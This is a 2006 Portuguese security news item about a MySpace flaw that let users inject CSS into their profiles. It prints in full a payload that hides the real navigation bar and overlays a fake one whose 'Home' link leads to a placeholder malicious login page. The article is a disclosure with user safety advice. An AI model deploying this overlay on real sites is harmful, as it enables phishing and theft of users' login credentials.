Total Security - www.totalsecurity.com.br
Gerais
Segunda - 04 de Dezembro de 2006 às 20:49
Por: Luiz Celso

    Imprimir


Falha na página de usuário do famoso site de relacionamento myspace.com, possibilita introdução de código malicioso em css.
O site underground caughq.org publicou um relatório sobre uma falha na página de usuário do famoso site de relacionamento myspace.com, possibilitando introdução de código malicioso em css.

O myspace tem um menu de navegação no topo de todas as páginas, assim usuários o usam para navegarem por todo o site.O menu contém o botão home que leva para a página do usuário. Podendo assim, com um código malicioso redirecionar o usuário para uma página externa contendo um form de login. Como o site tem o costume de expirar os logins com muita facilidade, a vítima não achará estranho ser levado para tal site malicioso.

O site sugere que o myspace não permita que usuários possam introduzir códigos em css nos seus profiles.

A TotalSecurity recomenda ao usuário do myspace verificar sempre a existência de um cadeado na parte superior ou inferior do browser(dependendo do mesmo), se tem o prefixo HTTPS no endereço e lógico, se na barra de endereços contém myspace.com .




*Código completo(sem tags), onde o atacante botará na parte About Me para substituir o menu original:

-
style type=text/css
div table td font {display: none;}
/style

div style=z-index:5; background-color:000000; position:absolute; top:125px; left:50%; margin-left:-395px; width:790px; height:15px; align=centerfont color=b/b/fontbr

a href=http://www.SITE MALICIOSO.com/login.html target=font color=ffffffHome/font/a
font color=ff0099 |/font

a href=http://browseusers.myspace.com/browse/browse.aspx? target=font color=ffffffBrowse/font/a
font color=ff0099 |/font

a href=http://search.myspace.com/index.cfm?fuseaction=find target=font color=ffffffSearch/font/a
font color=ff0099 |/font

a href=http://invite.myspace.com/index.cfm?fuseaction=invite target=font color=ffffffInvite/font/a
font color=ff0099 |/font

a href=http://www.myspace.com/index.cfm?fuseaction=film target=font color=ffffffFilm/font/a
font color=ff0099 |/font

a href=http://messaging.myspace.com/index.cfm?fuseaction=mail.inbox target=font color=ffffffMail/font/a
font color=ff0099 |/font

a href=http://blog.myspace.com/index.cfm?fuseaction=blog.controlcenter target=font color=ffffffBlog/font/a
font color=ff0099 |/font

a href=http://favorites.myspace.com/index.cfm?fuseaction=user.favorites target=font color=ffffffFavorites/font/a
font color=ff0099 |/font

a href=http://forum.myspace.com/index.cfm?fuseaction=messageboard.categories target=font color=ffffffForum/font/a
font color=ff0099 |/font

a href=http://groups.myspace.com/index.cfm?fuseaction=groups.categories target=font color=ffffffGroups/font/a
font color=ff0099 |/font

a href=http://events.myspace.com/index.cfm?fuseaction=events target=font color=ffffffEvents/font/a
font color=ff0099 |/font

a href=http://www.myspace.com/index.cfm?fuseaction=vids target=font color=ffffffVideos/font/a
font color=ff0099 |/font

a href=http://www.myspace.com/index.cfm?fuseaction=music target=font color=ffffffMusic/font/a
font color=ff0099 |/font

a href=http://www.myspace.com/index.cfm?fuseaction=comedian.home target=font color=ffffffComedy/font/a
font color=ff0099 |/font

a href=http://classifieds.myspace.com/index.cfm?fuseaction=classifieds target=font color=ffffffClassifieds/font/a
/divstyle type=text/cssdiv div table tr td a.navbar, div div table tr td font {display: none;}/style




Fonte: Eu escrevi

Comentários

Deixe seu Comentário

URL Fonte: http://www.totalsecurity.com.br/noticia/1536/visualizar/